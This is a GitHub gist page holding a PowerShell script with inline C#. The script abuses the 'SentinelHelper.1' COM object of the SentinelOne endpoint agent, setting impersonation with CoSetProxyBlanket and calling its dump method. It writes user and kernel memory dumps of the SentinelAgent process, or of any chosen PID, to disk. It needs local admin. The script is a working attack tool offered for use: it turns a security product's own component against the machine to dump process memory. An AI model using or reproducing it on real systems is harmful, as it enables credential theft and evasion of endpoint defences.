-
-
Save adamsvoboda/8e248c6b7fb812af5d04daba141c867e to your computer and use it in GitHub Desktop.
Uses a CoSetProxyBlanket to call the dump function in SentinelHelperService.exe to dump a PID to disk. Requires local admin.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-HelperComObject { | |
| $code = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class ImpTest | |
| { | |
| [DllImport("Ole32.dll", CharSet = CharSet.Auto)] | |
| public static extern int CoSetProxyBlanket( | |
| IntPtr pProxy, | |
| uint dwAuthnSvc, | |
| uint dwAuthzSvc, | |
| uint pServerPrincName, | |
| uint dwAuthLevel, | |
| uint dwImpLevel, | |
| IntPtr pAuthInfo, | |
| uint dwCapabilities | |
| ); | |
| public static int SetSecurity(object objDCOM) | |
| { | |
| IntPtr dispatchInterface = Marshal.GetIDispatchForObject(objDCOM); | |
| int hr = CoSetProxyBlanket( | |
| dispatchInterface, | |
| 0xffffffff, | |
| 0xffffffff, | |
| 0xffffffff, | |
| 0, // Authentication Level | |
| 3, // Impersonation Level | |
| IntPtr.Zero, | |
| 64 | |
| ); | |
| return hr; | |
| } | |
| } | |
| "@ | |
| try { | |
| Add-Type -TypeDefinition $code | Out-Null | |
| log "Initializing SentinelHelper COM object..." | Out-Null | |
| $SentinelHelper = New-Object -com "SentinelHelper.1" | |
| log "SentinelHelper COM object initialized successfully" | Out-Null | |
| [ImpTest]::SetSecurity($SentinelHelper) | Out-Null | |
| $SentinelHelper | |
| } catch { | |
| logException -Msg "Error getting helper com object" -Ex $_ | Out-Null | |
| } | |
| } | |
| function DumpSentinelAgent { | |
| log "Trying to dump SentinelAgent to '$env:SystemRoot\temp\' ..." | |
| try { | |
| $SentinelHelper = Get-HelperComObject | |
| function TakeDump { | |
| param( | |
| [int] $ProcessId, | |
| [string] $User, | |
| [string] $Kernel | |
| ) | |
| $SentinelHelper.dump($ProcessId, $User, $Kernel) | |
| } | |
| log "Fetching SentinelAgent ProcessId..." | |
| $sentinelAgentProcessId = (Get-Process -Name SentinelAgent).Id | |
| log "SentinelAgent Found: $sentinelAgentProcessId" | |
| TakeDump -SentinelHelper $SentinelHelper ` | |
| -ProcessId $sentinelAgentProcessId ` | |
| -User $("$env:SystemRoot\temp\__SentinelAgentUser.dmp") ` | |
| -Kernel $("$env:SystemRoot\temp\__SentinelAgentKernel.dmp") | |
| } catch { | |
| log -Msg "Error running helper commands" -Ex $_ | |
| } | |
| } | |
| function DumpProcessPid { | |
| param( | |
| [int] $targetPID, | |
| [string] $outputFile | |
| ) | |
| log "Trying to dump process ID $targetPID to '$outputFile' ..." | |
| try { | |
| $SentinelHelper = Get-HelperComObject | |
| function TakeDump { | |
| param( | |
| [int] $ProcessId, | |
| [string] $User, | |
| [string] $Kernel | |
| ) | |
| $SentinelHelper.dump($ProcessId, $User, $Kernel) | |
| } | |
| log "Dumping Process ID: $targetPID" | |
| $userDump = $outputFile + "__User.dmp" | |
| $kernelDump = $outputFile + "__Kernel.dmp" | |
| TakeDump -SentinelHelper $SentinelHelper ` | |
| -ProcessId $targetPID ` | |
| -User $userDump ` | |
| -Kernel $kernelDump | |
| } catch { | |
| log -Msg "Error running helper commands" -Ex $_ | |
| } | |
| } | |
| function log { | |
| param( | |
| [string] $Msg, | |
| [string] $Ex | |
| ) | |
| Write-Host "[$(Get-Date)] $Msg $Ex" | |
| } | |
| DumpSentinelAgent | |
| # DumpProcessPid -targetPID 1256 -outputFile "C:\filename" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment